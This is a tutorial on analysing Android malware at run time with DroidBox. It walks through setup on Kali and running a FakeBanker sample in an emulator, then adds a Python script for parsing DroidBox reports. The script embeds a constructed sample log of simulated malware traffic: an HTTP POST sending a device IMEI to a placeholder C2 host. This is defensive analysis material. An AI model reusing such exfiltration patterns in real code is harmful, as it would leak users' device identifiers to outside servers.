How to perform dynamic analysis of an Android application using DroidBox



DroidBox is a tool for dynamic analysis of Android applications: it runs the APK in a sandbox, records what the app does, and reports the following:
  • Hashes for the analyzed package
  • Incoming/outgoing network data
  • File read and write operations
  • Started services and loaded classes through DexClassLoader
  • Information leaks via the network, file and SMS
  • Circumvented permissions
  • Cryptography operations performed using Android API
  • Listing broadcast receivers
  • Sent SMS and phone calls
Additionally, two images are generated visualizing the behavior of the package. One showing the temporal order of the operations and the other one being a treemap that can be used to check similarity between analyzed packages.
Here is the source code for DroidBox: LINK.
Disclaimer – Our tutorials are designed to aid aspiring pen testers/security enthusiasts in learning new skills, we only recommend that you test this tutorial on a system that belongs to YOU. We do not accept responsibility for anyone who thinks it’s a good idea to try to use this to attempt to hack systems that do not belong to you.
Requirements for DroidBox
  • First, install the system packages DroidBox and its Python dependencies need:
<code>root@kali:~# apt-get install python-virtualenv libatlas-dev liblapack-dev libblas-dev</code>
You'll need those in order to build scipy, matplotlib and numpy for use with DroidBox. Now create a virtual environment and install the Python dependencies:
<code>root@kali:~/work/apk# mkdir env
root@kali:~/work/apk# virtualenv env
...
root@kali:~/work/apk# source env/bin/activate
(env)root@kali:~/work/apk# pip install numpy scipy matplotlib</code>

Install DroidBox

In the IPython notebook, put the Android SDK tools on PATH and change into the DroidBox directory (adjust the paths to your own SDK and DroidBox locations):

<code>import os
import sys

# Setup new PATH: add the SDK tools, platform-tools (adb) and build-tools
old_path = os.environ['PATH']
new_path = old_path + ":" + "/root/work/apk/SDK/android-sdk-linux/tools:/root/work/apk/SDK/android-sdk-linux/platform-tools:/root/work/apk/SDK/android-sdk-linux/build-tools/19.1.0"
os.environ['PATH'] = new_path

# Change working directory to the DroidBox checkout
os.chdir("/root/work/apk/DroidBox_4.1.1/")</code>

Setup IPython settings

<code>%pylab inline
import binascii
import pandas as pd
import numpy as np
import matplotlib.pyplot as plt
import networkx as nx
import datetime as dt
import time
import ipy_table
from IPython.display import display_pretty, display_html, display_jpeg, display_png, display_json, display_latex, display_svg
from IPython.display import HTML
from IPython.core.magic import register_cell_magic, Magics, magics_class, cell_magic
import jinja2

# IPython / pandas display settings
pd.set_option('display.height', 1000)
pd.set_option('display.max_rows', 500)
pd.set_option('display.max_columns', 500)
# cell values longer than 100 characters are shown shortened with '...'
pd.set_option('display.max_colwidth', 100)
pd.set_option('display.width', 1000)
pd.set_option('display.column_space', 1000)</code>

Now create an Android Virtual Device

You can run the analysis on a physical Android device, but you can also use an Android Virtual Device (the emulator), which is what is done here.
Here is the command to create the Android Virtual Device:
<code># android create avd --abi default/armeabi-v7a -n android-4.1.2-droidbox -t 1 -c 1000M
Android 4.1.2 is a basic Android platform.
Do you wish to create a custom hardware profile [no]
Created AVD 'android-4.1.2-droidbox' based on Android 4.1.2, ARM (armeabi-v7a) processor,
with the following hardware config:
hw.lcd.density=240
hw.ramSize=512
hw.sdCard=yes
vm.heapSize=48</code>

Run DroidBox

<code>Waiting for the device...
Installing the application /root/work/apk/DroidBox_4.1.1/APK/FakeBanker.apk...
Running the component com.gmail.xpack/com.gmail.xpack.MainActivity...
Starting the activity com.gmail.xpack.MainActivity...
Application started
Analyzing the application during infinite time seconds...
^C</code>
DroidBox will then listen for activities until you kill it with ^C.
Meanwhile I was interacting with the app and saw that DroidBox was collecting the logs during the interactions.

DroidBox's report then covers:
  • File System Activities
  • Network Activities
  • Sent Data
  • Received Data
  • Request Sequence
  • Crypto activities
  • Activities Chart
I think DroidBox is a very good tool to deal with Android APKs and analyze their behaviour during run-time. It comes with a working mobile sandbox meant to inspect and monitor an application's activities. However, during my analysis I had to rely on previous analysis since the results didn't contain the full details. Not only the network traffic but also the contents read from files weren't complete. In order to fully understand one malware I need complete details about its behaviour. For example, I had the following response from the server, which is completely useless:
<code>HTTP/1.1 406 Not Acceptable\r\nDate: Mon, 28 Jul 2014 13:29:38 GMT\r\nServer: Apache\r\nContent-...</code>
Besides that, I was indeed able to see that the application is reading from some file. But the delivered content was once again stripped:
<code><?xml version='1.0' encoding='utf-8' standalone='yes' ?>\n<map>\n<string name="DOWNLOADDOMAIN">c...</code>
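To work from the full record rather than from a table view, read DroidBox's JSON report directly and hex-decode each payload yourself. The script below is an added example, not code from this page or from the DroidBox project. It assumes the report layout of DroidBox 4.1.1 (each category such as fdaccess, sendnet, recvnet, cryptousage and dataleaks maps a timestamp string to an event dict, and payload fields are hex-encoded); the sample report embedded in it is constructed, with placeholder hashes and documentation-range addresses, and mirrors the two observations above (a 406 response and a shared-preferences file naming a download domain).

```python
import binascii
import json


def _hx(b: bytes) -> str:
    """Hex-encode bytes the way DroidBox stores payloads (assumption)."""
    return binascii.hexlify(b).decode()


# Constructed sample shaped like a DroidBox 4.1.1 JSON report (assumed layout).
SAMPLE_REPORT = json.dumps({
    "apkName": "/path/to/sample.apk",                   # placeholder
    "hashes": ["<md5>", "<sha1>", "<sha256>"],         # placeholders
    "recvsaction": {"com.example.Boot": "android.intent.action.BOOT_COMPLETED"},
    "enfperm": [], "servicestart": {}, "dexclass": {},
    "sendsms": {}, "phonecalls": {}, "closenet": {},
    "accessedfiles": {"0.512": "/data/data/com.example/shared_prefs/cfg.xml"},
    "fdaccess": {"0.512": {"operation": "read",
                           "path": "/data/data/com.example/shared_prefs/cfg.xml",
                           "data": _hx(b"<?xml version='1.0' encoding='utf-8' standalone='yes' ?>\n"
                                       b"<map>\n<string name=\"DOWNLOADDOMAIN\">c2.example.invalid"
                                       b"</string>\n</map>")}},
    "cryptousage": {"1.100": {"operation": "keyalgo", "key": "0102030405060708",
                              "algorithm": "DES"},
                    "1.150": {"operation": "encryption", "algorithm": "DES/ECB/PKCS5Padding",
                              "data": _hx(b"000000000000000")}},
    "opennet": {"1.204": {"desthost": "203.0.113.10", "destport": "80", "fd": "35"}},
    "sendnet": {"1.310": {"type": "network write", "desthost": "203.0.113.10",
                          "destport": "80",
                          "data": _hx(b"POST /g HTTP/1.1\r\nHost: c2.example.invalid\r\n\r\n"
                                      b"imei=000000000000000")}},
    "dataleaks": {"1.310": {"sink": "Network", "tag": ["TAINT_IMEI"],
                            "desthost": "203.0.113.10", "destport": "80",
                            "data": _hx(b"imei=000000000000000")}},
    "recvnet": {"1.902": {"type": "network read", "host": "203.0.113.10", "port": "80",
                          "data": _hx(b"HTTP/1.1 406 Not Acceptable\r\nServer: Apache\r\n\r\n")}},
})

EVENT_CATEGORIES = ("fdaccess", "cryptousage", "opennet", "sendnet", "recvnet",
                    "closenet", "dataleaks", "servicestart", "dexclass",
                    "sendsms", "phonecalls")
# Algorithm/mode names that deserve a second look in a malware sample.
WEAK_CRYPTO_MARKERS = ("DES", "RC4", "ECB")


def decode_hex(data: str) -> str:
    """Hex-decode a DroidBox payload field; return the raw string if it is not hex."""
    try:
        return binascii.unhexlify(data).decode("utf-8", errors="replace")
    except (binascii.Error, ValueError):
        return data


def load_report(text: str) -> dict:
    return json.loads(text)


def timeline(report: dict) -> list:
    """Every timestamped event, oldest first: (seconds, category, event dict)."""
    events = [(float(ts), cat, ev)
              for cat in EVENT_CATEGORIES
              for ts, ev in report.get(cat, {}).items()]
    events.sort(key=lambda e: e[0])   # stable sort keeps category order on ties
    return events


def network_payloads(report: dict) -> list:
    """Decoded outbound ('out') and inbound ('in') payloads with their peer."""
    out = []
    for ts, cat, ev in timeline(report):
        if cat == "sendnet":
            out.append((ts, "out", ev["desthost"] + ":" + ev["destport"], decode_hex(ev["data"])))
        elif cat == "recvnet":
            out.append((ts, "in", ev["host"] + ":" + ev["port"], decode_hex(ev["data"])))
    return out


def file_reads(report: dict) -> dict:
    """Decoded contents of every file the app read, keyed by path."""
    return {ev["path"]: decode_hex(ev["data"])
            for ev in report.get("fdaccess", {}).values() if ev["operation"] == "read"}


def leaks(report: dict) -> list:
    """Taint-tracked leaks: (time, sink, tags, destination host or path)."""
    return [(float(ts), ev["sink"], tuple(ev["tag"]), ev.get("desthost") or ev.get("path"))
            for ts, ev in report.get("dataleaks", {}).items()]


def weak_crypto(report: dict) -> list:
    """Distinct algorithm strings from the crypto API log that match a weak marker."""
    return sorted({ev["algorithm"] for ev in report.get("cryptousage", {}).values()
                   if any(m in ev.get("algorithm", "").upper() for m in WEAK_CRYPTO_MARKERS)})


if __name__ == "__main__":
    rep = load_report(SAMPLE_REPORT)
    for ts, cat, ev in timeline(rep):
        where = ev.get("path") or ev.get("desthost") or ev.get("host") or ev.get("algorithm") or ""
        print(f"{ts:8.3f} {cat:12s} {where}")
    for ts, direction, peer, payload in network_payloads(rep):
        print(f"{direction:3s} {peer}: {payload!r}")
    print("leaks:", leaks(rep), "weak crypto:", weak_crypto(rep))
```

Decoding the hex yourself shows exactly where each payload ends, and the leak entries pair a taint tag with its sink, so an IMEI reaching the network stands out without reading raw hex. A table view with a column width limit, such as pandas' display.max_colwidth, shortens long cell values with "..." on display only; the JSON report on disk is not affected by that setting.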
